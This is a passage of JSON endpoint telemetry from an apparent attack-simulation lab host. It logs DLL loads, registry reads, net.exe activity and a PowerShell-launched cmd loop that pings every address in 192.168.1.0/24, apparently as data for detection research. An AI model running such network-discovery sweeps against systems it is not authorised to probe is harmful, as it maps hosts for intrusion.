"ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956360000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL\\ClockData", - "registry_value": "ClockData", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883571967310016, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883571968400000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883571968400000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_value": "DiagTrack", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulUploadTime", - "registry_value": "LastSuccessfulUploadTime", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_value": "DiagTrack", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulNormalUploadTime", - "registry_value": "LastSuccessfulNormalUploadTime", - "timestamp": 131883571969650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "destination_address": "52.114.128.8", - "destination_port": "443", - "event_type": "network", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50504", - "subtype": "outgoing", - "timestamp": 131883571967820000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "process", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "process", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3276, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883572002260000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002150000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002300000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "event_type": "process", - "pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883572002300000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7328, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883572002880000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.1", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6948, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572003000000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003240000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003240000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "process", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572003550000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "file", - "file_name": "PING.EXE-B29F6629.pf", - "file_path": "C:\\Windows\\Prefetch\\PING.EXE-B29F6629.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883572003550000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.2", - "event_type": "process", - 